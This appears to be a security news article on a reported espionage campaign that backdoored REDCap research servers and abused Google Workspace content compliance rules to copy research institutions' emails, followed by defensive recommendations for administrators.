How Hackers Turned Google Workspace into a Data-Siphoning Tool—and What It Means for Research Labs

A China-linked espionage group spent more than a year inside North American medical, academic, and military research networks, quietly stealing sensitive emails by hijacking Google Workspace rules and planting a backdoor on REDCap research servers. The attackers did not need to break encryption or deploy malware on every employee laptop. Instead, they rewired the victims’ own Google Workspace settings so that any message matching a list of keywords was silently copied to an attacker-controlled Gmail address. Once inside, the group also moved laterally to gain domain administrator rights, giving them broad access to internal systems and data.

The campaign shows how cloud collaboration tools, designed to simplify sharing and compliance, can be repurposed for data theft when attackers gain even a small foothold. For research institutions that rely on REDCap for clinical trials and Google Workspace for day-to-day communication, the incident is a reminder that email and database platforms can become silent pipelines for exfiltration if administrative controls are not tightly managed.

A Backdoor on REDCap: The Initial Compromise

The entry point was REDCap, a widely used web platform that hospitals, universities, and military health institutions rely on to build and manage study databases. According to a detailed report, the group—tracked by analysts as UNC6508—compromised externally facing REDCap servers, planting a backdoor that stole login credentials. The initial access vector remains unclear; analysts have not linked the intrusion to a specific software flaw or version. Instead, they observed the group probing older, vulnerable instances, suggesting that unpatched or misconfigured servers were the likely targets.

Once inside, the attackers deployed custom malware named INFINITERED, which trojanizes REDCap’s own system files. This malware performs internal reconnaissance, pulling database and service account credentials. With these credentials, the group moved deeper into the network, eventually reaching a domain administrator account. The timeline shows the earliest known compromise occurred in September 2023, with activity continuing through at least November 2025. During this period, the group operated quietly, avoiding detection while gathering sensitive information.

For research institutions, the lesson is clear: even trusted platforms like REDCap can become gateways for attackers if they are exposed to the internet and not kept fully patched. Many organizations deploy REDCap for sensitive health and defense-related studies, making it a high-value target. The fact that the initial access vector remains unidentified underscores the need for continuous monitoring and prompt patching, especially for externally facing applications.

From Credentials to Admin Rights: Lateral Movement

After harvesting credentials from the REDCap server, the group pivoted to lateral movement within the victim’s network. They used the stolen logins to access internal systems and escalate privileges, ultimately gaining control of a domain administrator account. Analysts have not detailed the exact path taken to reach this level of access, but the progression suggests a methodical approach: first, compromise a low-value but credential-rich system, then use those credentials to move toward higher-value targets.

Domain administrator rights are particularly dangerous because they allow attackers to modify policies, create new accounts, and access nearly any resource on the network. In this case, the group’s goal was not just to steal data but to set up a persistent exfiltration channel. By gaining admin rights, they could configure Google Workspace settings without raising immediate suspicion, ensuring that their data theft would continue undetected for months.

For IT teams in research institutions, this phase of the attack highlights the importance of least-privilege access and strict credential hygiene. Service accounts and database logins should be tightly controlled, and domain admin credentials should be reserved for emergency use only. Regular audits of privileged accounts and unusual login patterns can help detect lateral movement before attackers reach critical systems.

Weaponizing Google Workspace Rules: The Exfiltration Trick

The most unusual and effective part of the campaign was how the attackers exfiltrated data. Instead of relying on malware to siphon emails from individual devices, they abused a legitimate Google Workspace feature called content compliance rules. These rules allow administrators to scan incoming and outgoing mail for specific keywords, phrases, or email addresses, and then automatically copy or forward matching messages to another address.

The group created a rule with a misspelled keyword—“Patroit”—that watched for nearly 150 keywords, search terms, and email addresses. When a message matched any of these terms, Google Workspace silently BCC’d it to an attacker-controlled Gmail address. The attackers had effectively turned the victim’s own email system into a data pipeline, bypassing encryption and endpoint protections. Google has since disabled the rogue rule and the attacker-controlled inbox, but the damage had already been done.

This technique is stealthy because it uses built-in functionality, avoiding the need for malware on end-user devices. It also scales well: once the rule is in place, every matching email is automatically copied, capturing both historical and future messages. For research institutions handling sensitive health, defense, or academic data, this means that even well-secured email systems can be turned against them if administrative controls are not properly managed.

Why Research Institutions Are Prime Targets

The victims spanned multiple sectors: clinical providers, academic medical centers, military health institutions, advocacy groups, and health regulators. These organizations are attractive to espionage groups because they handle sensitive data on behalf of governments, universities, and defense contractors. REDCap is commonly used to manage clinical trials, patient data, and research protocols, making it a treasure trove for attackers seeking intellectual property or classified information.

The timing of the campaign is also notable. The earliest compromise dates to September 2023, with activity continuing through at least November 2025. This prolonged presence suggests that the attackers were not opportunistic but rather highly focused on long-term intelligence gathering. For institutions involved in defense-related research, the risk is especially acute, as stolen data could compromise national security or give adversaries a competitive edge in sensitive fields.

Moreover, the use of Google Workspace rules for exfiltration demonstrates how attackers adapt to their targets’ technology stacks. Many research institutions rely on Google Workspace for collaboration, making it a familiar and trusted environment. When attackers can abuse built-in features, they reduce the need for custom malware, lowering the chance of detection and increasing the likelihood of success.

Practical Steps to Detect and Prevent Similar Attacks

For research institutions and other high-value targets, there are concrete steps to reduce the risk of a similar campaign. First, restrict external access to REDCap and other research platforms. Use VPNs, IP allowlisting, and multi-factor authentication to ensure that only authorized users can log in. Regularly patch and update all software, especially externally facing applications, and monitor for unusual login attempts or credential harvesting.

Second, tighten Google Workspace administration. Limit who can create or modify content compliance rules, and require multi-factor authentication for all admin accounts. Audit existing rules regularly to ensure none are forwarding or copying messages to unexpected addresses. Consider disabling BCC-based forwarding rules unless absolutely necessary, and monitor for rules that use misspelled keywords or unusual patterns.

Third, implement network segmentation and least-privilege access. Ensure that service accounts and database logins have only the permissions they need, and avoid using domain admin credentials for routine tasks. Monitor lateral movement by tracking unusual login patterns or access to privileged accounts. Regular audits of admin activity can help detect signs of compromise early.

Finally, invest in threat detection and response capabilities. Deploy endpoint detection and response tools to monitor for suspicious activity on research servers, and use network traffic analysis to spot unusual data flows. Establish clear incident response procedures so that security teams can quickly contain and remediate any breach.

What to Watch Next: Cloud Abuse and Espionage Trends

The UNC6508 campaign is part of a broader trend in which state-linked groups abuse legitimate cloud and collaboration tools for espionage. As more organizations migrate to cloud platforms like Google Workspace, Microsoft 365, and Slack, attackers are shifting their focus from endpoint malware to abusing built-in features. These platforms offer powerful administrative tools that can be repurposed for data theft, making them attractive targets for sophisticated groups.

Analysts expect this trend to continue, with attackers increasingly leveraging cloud-native features for persistence, exfiltration, and command-and-control. Features like email forwarding rules, third-party app integrations, and automated workflows can all be abused if not properly secured. Research institutions, in particular, should be vigilant, as their reliance on cloud platforms and specialized research tools makes them vulnerable to similar attacks.

For the cybersecurity community, the challenge is to balance usability with security. Cloud platforms are designed to be flexible and user-friendly, but that flexibility can also be exploited. Security teams must work closely with administrators to ensure that powerful features are used responsibly and that monitoring is in place to detect abuse. As attackers grow more sophisticated, defenders must adapt by focusing on visibility, least-privilege access, and rapid response.

Conclusion

The UNC6508 campaign demonstrates how attackers can turn trusted platforms into silent pipelines for data theft. By compromising a REDCap server and then abusing Google Workspace rules, the group spent more than a year quietly stealing sensitive emails from research institutions across North America. The attack highlights the need for research labs to harden their externally facing platforms, tightly control administrative privileges, and monitor cloud environments for signs of abuse.

For organizations that handle sensitive data, the message is clear: the tools designed to simplify collaboration can also become tools for espionage if not properly secured. By implementing strong access controls, regular audits, and robust monitoring, research institutions can reduce the risk of falling victim to similar campaigns and protect their critical research and intellectual property.